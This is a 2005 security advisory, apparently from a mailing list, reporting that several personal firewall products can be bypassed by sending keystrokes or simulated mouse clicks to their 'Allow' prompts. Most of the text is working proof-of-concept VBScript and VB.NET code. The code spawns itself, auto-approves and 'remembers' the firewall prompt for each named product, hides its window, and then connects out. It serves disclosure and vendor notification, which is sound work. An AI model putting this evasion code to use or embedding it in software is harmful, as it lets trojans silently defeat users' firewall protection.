<<< Date Index >>>     <<< Thread Index >>>

Multiple Firewall Products Bypass Vulnerability



-------------------------------------------------------------------
Multiple Firewall Products Bypass Vulnerability 
-------------------------------------------------------------------
Online URL              : http://ferruh.mavituna.com/article/?769
Download POC    : http://ferruh.mavituna.com/opensource/firewallbypass.zip
(Also I attached vbs files as txt, one of them is -mousecontrol.txt- vb.net
source code)

This is a generic problem of common Personal Firewall products which are
accept shortcuts or provide an interface that enables to click without
require a password for controlled actions (acting as server -listening
ports-, executing another program, connecting to another computer etc.).

-------------------------------------------------------------------
Problem;
-------------------------------------------------------------------
Most of personal firewalls allow shortcuts or interface for controlling
traffic. It's simple to bypass these firewalls by a multithreaded program
and sending keys or by contolling mouse.

This flaw enables that any Trojan or similar programs can easily bypass
firewall and act as a server or access to another computer. Also most of
these firewalls have a "remember" option so if you bypass firewall and
successfully exploit it, firewall will never ask again.

This is a similar threat with shattering attacks, but different method and
impact.

Vulnerable Products (Sending Key Method and Mouse Control);
These products are vulnerable to both of "Sending Key Method" and "Mouse
Control Method" 

Test Platforms;
Fully Patched Windows XP Professional and Windows 2003 Enterprise Edition
(May 19, 2004 - 01.01.2005)

1.      ZoneAlarm / ZoneAlarm Pro (www.zonelabs.com) | Fixed
        I.      4.5.530.000     - Tested
        II.     4.5.538.001     - Tested
        III.    5 and newer versions are not vulnerable...

2.      Kerio (www.kerio.com)
        I.      4.0.14          - Tested
        II.     All Versions

3.      Agnitium Outpost Firewall (www.agnitium.com)
        I.      2.1.303.4009 (314)      - Tested
        II.     2.5.369.4608 (369)      - Tested
        II.     All Versions

4.      Kaspersky Anti-Hacker (www.kaspersky.com) 
        I.      1.5.119.0       - Tested
        II.     All Versions

5.      Look 'n' Stop (www.looknstop.com)
        I.      2.04p2          - Tested
        II.     All Versions

6.      Symantec's Norton Personal Firewall (www.norton.com)
        I.      2004            - Tested
        II.     All Versions

-------------------------------------------------------------------
Vulnerable Products (Mouse Control);
-------------------------------------------------------------------
These products are only vulnerable to "Mouse Control Method", because they
don't accept shortcuts but still vulnerable to "Mouse Control" attacks.

1.      Panda Platinum Internet Security
        I.      8.03 (tested)
        II.     All Versions

2.      Omniquad Personal Firewall
        I.      1.1 (tested)
        II.     All Versions


-------------------------------------------------------------------
Proof of Concept;
-------------------------------------------------------------------
2 Proof of Concepts attached to advisory (also some other POCs for some
firewalls)

First POC (bypassSendKey.vbs) written in VBScript (.vbs), This POC include
required samples for ZoneAlarm, Kerio, Agnitium, Kaspersky Anti-Hacker, Look
'n' Stop and Symantec's Norton Personal Firewall. This script is executing
an instance of itself for multithreading and send shortcuts to firewall
while first instance trying to connect internet. I didn't write an auto
determine firewall function (but it's so easy), so you need to set it by
yourself.

Second (bypassMouseControl.txt) simulates an example of bypassing Zone Alarm
Firewall by with mouse control, code in VB.NET. Program is not using a real
multithread because some firewalls interrupt executing of program directly.
So program is executing another instance of itself with an argument.

Both of them add themselves to secure app list of firewalls and then bypass
active firewall.

Also I attached testFirewall.vbs for testing your firewall for application
control. 

-------------------------------------------------------------------
Solution;
-------------------------------------------------------------------
All firewalls should ask password for all kind of "Allow" actions. In fact
passwords can be fooled because of its nature but it is the best user
friendly / secure solution for protection.

As a user of these firewalls, if your firewall supports to "deny all
default" option, enable it, so your firewall deny all connections by
default. After that you may can manually select programs for allow them.

-------------------------------------------------------------------
Final Words;
-------------------------------------------------------------------
This is a methodology for bypassing interacted firewalls so it's possible
that this advisory affects other firewalls in market. Also it's possible
that future firewalls will be affected too. I think for now this is a
serious problem for firewalls, until they imply password/random human need
text method for "Allow/Deny" actions.

-------------------------------------------------------------------
History;
-------------------------------------------------------------------
Discovered: 03.05.2004
Vendors Informed: 28.08.2004
Published: 03.01.2005

-------------------------------------------------------------------
Vendors Status;
-------------------------------------------------------------------
Special thanks to ZoneLabs Team.


Ferruh Mavituna
http://ferruh.mavituna.com
pgpkey : http://ferruh.mavituna.com/PGPKey.asc

'***********************************************************
'// By Ferruh Mavituna 
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)
'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369)
'5/5/2004
'02.01.2005
'Ferruh Mavituna
        'Const DELAY = 1000
        'Const TIMES = 1
        'Const EXTRADELAY = 0

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 1000
Const TIMES = 1
Const EXTRADELAY = 0

appName = Wscript.ScriptName

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True 

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
        
        'First Sleep for a while
        If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

        'Force
        While i<TIMES
                i=i+1
                WScript.Sleep DELAY
                '1) First add it  trusted
                shell.sendKeys "+{TAB}" 'Go back once
                shell.sendKeys "{UP 2}" 'Go Up

                '1) Press Enter
                shell.sendKeys "{ENTER}" 'Enter
        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com";) & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web = CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect = web.getAllResponseHeaders
        Set web = Nothing
End Function
'***********************************************************
'// By Ferruh Mavituna 
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'HISTORY
        '3/5/2004
                'Added ZA

        '5/5/2004
                'Added Kerio, Outpost

        '6/5/2004
                'Added Kaspersky Anti-Hacker 
'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
        '// Firewalls
        'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP)
        Const ZoneAlarm = 0
        
        'Kerio 4.0.14
        Const Kerio = 1

        'Agnitium Outpost Firewall 2.1.303.4009 (314)
        Const Outpost = 2

        'Kaspersky Anti-Hacker 1.5.119.0
        Const Kaspersky = 3

        'Select Active Firewall
        intFirewall = Kaspersky

        '// Configuration
        'Kaspersky Anti-Hacker 
        arrDelays(Kaspersky,0) = 1000
        arrDelays(Kaspersky,1) = 1

        'Define Keys for Firewalls
        arrKeys(Kaspersky,0) = "{ENTER}"



If DETERMINEFIREWALL Then
        'TODO:Read Registries and determine it !
End If

Dim argLen, shell, sendKeyMod, i, j, appName
appName = Wscript.ScriptName

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True 

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
        
        'First Sleep for a while
        If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

        'Force
        While i<arrDelays(intFirewall,1)
                i=i+1
                WScript.Sleep arrDelays(intFirewall,0)
                
                'Send Keys
                For j=0 To Ubound(arrKeys,2)
                        If arrKeys(intFirewall,j)<>"" Then 
                                shell.sendKeys arrKeys(intFirewall,j)
                        End If
                Next

        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com";) & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web = CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect = web.getAllResponseHeaders
        Set web = Nothing
End Function
'***********************************************************
'// By Ferruh Mavituna 
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit

Dim argLen, shell, sendKeyMod, i
Const DELAY = 10
Const TIMES = 15

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True 

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
        While i<TIMES
                i=i+1
                WScript.Sleep DELAY
                shell.sendKeys "%R" 'Remember, Do not ask again !
                shell.sendKeys "%Y" 'Click Yes
        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run("skipZA.vbs /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com";) & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web = CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect = web.getAllResponseHeaders
        Set web = Nothing
End Function
'***********************************************************
'// By Ferruh Mavituna 
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Simple Firewall Test File
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit

Dim shell, sendKeyMod, Result
Const URL = "http://ferruh.mavituna.com";

'Connect
Wscript.Echo "Now I'll try to connect to " & URL

If connect(URL,Result) Then
        Wscript.Echo "Mission Accomplished..., Here is the headers;" & 
vbNewline & Result
Else
        Wscript.Echo "OK, I couldn't access to Internet"
End If

Set shell = Nothing
Wscript.Quit 1

Function connect(ByVal URL, ByRef Result)
        connect = True
        On Error Resume Next
                
                ERR.Clear
                Dim web
                Set web = CreateObject("Microsoft.XmlHttp")
                web.open "HEAD", URL, FALSE
                web.send ""
                Result = web.getAllResponseHeaders
                Set web = Nothing

        If ERR<>0 Then connect = False
End Function
'***********************************************************
'// By Ferruh Mavituna 
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit

Dim argLen, shell, sendKeyMod, i
Const DELAY = 10
Const TIMES = 15

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True 

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
        While i<TIMES
                i=i+1
                WScript.Sleep DELAY
                shell.sendKeys "%A" 'Remember, Do not ask again !
                shell.sendKeys "%O" 'Click Yes
        Wend
        'Customized for norton fw by Oezguer Mavituna
        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run("skipZA.vbs /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com";) & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web = CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect = web.getAllResponseHeaders
        Set web = Nothing
End Function
'***********************************************************
'// By Ferruh Mavituna 
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 5/19/2004
'// Simple POC for Bypassing multiple firewall products
'// Code : VB.NET
'***********************************************************

Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx 
As Long, ByVal dy As Long, ByVal cbuttons As Long, ByVal dwExtraInfo As Long)
        Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)


        Private Const MOUSEEVENTF_LEFTDOWN = &H2
        Private Const MOUSEEVENTF_LEFTUP = &H4
        Private Const MOUSEEVENTF_MIDDLEDOWN = &H20
        Private Const MOUSEEVENTF_MIDDLEUP = &H40
        Private Const MOUSEEVENTF_RIGHTDOWN = &H8
        Private Const MOUSEEVENTF_RIGHTUP = &H10

        Private Const sleepTime = 0.5   'As Second
        Private Const slowMotion = True 'Debug !

        'Firewalls
        Const ZoneAlarm As Integer = 0

        'Set Points
        Dim arrFirewalls(1, 3) As Integer
        Dim activeFirewall As Integer = ZoneAlarm

        Private Sub setupFirewalls()
                'Get Current Screen
                'This is just POC, Real World Example should automaticly detect 
installed firewall, change sleep times, car about exact positoin, taskbar 
position etc. But It's easy to write a real world example
                Dim screenY As Integer = Screen.PrimaryScreen.Bounds.Height
                Dim screenX As Integer = Screen.PrimaryScreen.Bounds.Width

                arrFirewalls(ZoneAlarm, 0) = screenX - 250              'X 
Remember !
                arrFirewalls(ZoneAlarm, 1) = screenY - 130               'Y

                arrFirewalls(ZoneAlarm, 2) = screenX - 190               ' Yes
                arrFirewalls(ZoneAlarm, 3) = screenY - 93

        End Sub

        Private Sub frmFirewallTest_Load(ByVal sender As System.Object, ByVal e 
As System.EventArgs) Handles MyBase.Load

                'Hide  App
                Me.ShowInTaskbar = False
                Me.Visible = False

                'Args
                Dim flagArg As String = Application.ExecutablePath

                If Environment.GetCommandLineArgs().Length > 1 Then

                        'Sleep;
                        Sleep(sleepTime * 1000)

                        'Try;
                        setupFirewalls()

                        If slowMotion Then Sleep(1000)

                        'First Access
                        bypassFirewall(arrFirewalls(activeFirewall, 0), 
arrFirewalls(activeFirewall, 1))

                        If slowMotion Then Sleep(1000)
                        bypassFirewall(arrFirewalls(activeFirewall, 2), 
arrFirewalls(activeFirewall, 3))

                        'Gain Access for HTTP
                        Sleep(300)

                        If slowMotion Then Sleep(1000)
                        bypassFirewall(arrFirewalls(activeFirewall, 0), 
arrFirewalls(activeFirewall, 1))

                        If slowMotion Then Sleep(1000)
                        bypassFirewall(arrFirewalls(activeFirewall, 2), 
arrFirewalls(activeFirewall, 3))

                        'Quit !
                        Me.Dispose()
                Else

                        System.Diagnostics.Process.Start(flagArg, "skipme")

                        'Access Internet
                        If downloadURL() Then
                                MessageBox.Show("Successed !, Firewall ByPassed 
!", "Firewall ByPassed !", MessageBoxButtons.OK, MessageBoxIcon.Warning)

                        End If

                        Me.Dispose()
                End If

        End Sub


        'Bypas POC
        Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer)
                'Save Old Positions for return !
                Dim oldX As Integer = Cursor.Position.X
                Dim oldY As Integer = Cursor.Position.Y

                'Set New Position
                Cursor.Position = New Point(X, Y)

                'Click
                mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
                mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)

                'Return 
                Cursor.Position = New Point(oldX, oldY)

        End Sub

        'Connect Internet
        Private Function downloadURL() As Boolean
                downloadURL = True
                Try
                        Dim wc As New System.Net.WebClient()
                        wc.DownloadFile("http://ferruh.mavituna.com";, 
"C:\firewalltest.htm")
                Catch
                        MessageBox.Show("Can not connected !", "Not Connected 
!", MessageBoxButtons.OK, MessageBoxIcon.Error)
                        downloadURL = False
                End Try
        End Function
'***********************************************************
'// By Ferruh Mavituna 
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'***********************************************************
'HISTORY
        '3/5/2004
                'Added ZA

        '5/5/2004
                'Added Kerio, Outpost

        '6/5/2004
                'Added Kaspersky Anti-Hacker 
        
        '5/9/2004
                'LooknStop

        '5/20/2004
                'Norton
'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
        '// Firewalls
        'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | www.zonelabs.com
        Const ZoneAlarm = 0
        
        'Kerio 4.0.14
        Const Kerio = 1

        'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com
        Const Outpost = 2

        'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com
        Const Kaspersky = 3

        'Look 'n' Stop 2.04p2 | www.looknstop.com
        Const LooknStop = 4

        'Norton | www.norton.com
        Const Norton = 5

        'Select Active Firewall
        intFirewall = ZoneAlarm


        '// Configuration
        'Define Keys, Delays, Repeat Times for Firewalls
        
        'Kaspersky Anti-Hacker 
        arrDelays(Kaspersky,0) = 400
        arrDelays(Kaspersky,1) = 2

        arrKeys(Kaspersky,0) = "{ENTER}" 'Just say OK

        'ZoneAlarm
        arrDelays(ZoneAlarm,0) = 10
        arrDelays(ZoneAlarm,1) = 15

        arrKeys(ZoneAlarm,0) = "%R" 'Select Remember
        arrKeys(ZoneAlarm,1) = "%Y" 'Yes

        'Outpost
        arrDelays(Outpost,0) = 1000
        arrDelays(Outpost,1) = 1

        arrKeys(Outpost,0) = "+{TAB}" 'Go back once
        arrKeys(Outpost,1) = "{UP 2}" 'Go Up
        arrKeys(Outpost,1) = "{ENTER}" 'Enter

        'Kerio
        arrDelays(Kerio,0) = 100
        arrDelays(Kerio,1) = 10

        arrKeys(Kerio,0) = " " ' Space - Remember, Do not ask again !
        arrKeys(Kerio,1) = "%P" ' Yes

        'LookNStop
        arrDelays(LooknStop,0) = 1000
        arrDelays(LooknStop,1) = 1

        arrKeys(LooknStop,0) = "(%+{TAB})" ' Authorize
        arrKeys(LooknStop,1) = "{LEFT}" ' Left
        arrKeys(LooknStop, 2) = " " ' Space

        'Norton
        arrDelays(Norton,0) = 100
        arrDelays(Norton,1) = 5

        arrKeys(Norton,0) = "%A" ' Allow
        arrKeys(Norton,1) = "%O" ' OK


If DETERMINEFIREWALL Then
        'TODO:Read Registries and determine it !
End If

Dim argLen, shell, sendKeyMod, i, j, appName
appName = Wscript.ScriptName

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True 

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
        
        'First Sleep for a while
        If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

        'Force
        While i<arrDelays(intFirewall,1)
                i=i+1
                WScript.Sleep arrDelays(intFirewall,0)
                
                'Send Keys
                For j=0 To Ubound(arrKeys,2)
                        If arrKeys(intFirewall,j)<>"" Then 
                                shell.sendKeys arrKeys(intFirewall,j)
                        End If
                Next

        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com";) & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web = CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect = web.getAllResponseHeaders
        Set web = Nothing
End Function
'***********************************************************
'// By Ferruh Mavituna 
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Kerio 4.0.14
'5/5/2004
'Ferruh Mavituna
        'Const DELAY = 100
        'Const TIMES = 10
'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 100
Const TIMES = 10

appName = Wscript.ScriptName

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True 

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
        While i<TIMES
                i=i+1
                WScript.Sleep DELAY
                shell.sendKeys " " 'Remember, Do not ask again !
                shell.sendKeys "%P" 'Click Yes
        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com";) & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web = CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect = web.getAllResponseHeaders
        Set web = Nothing
End Function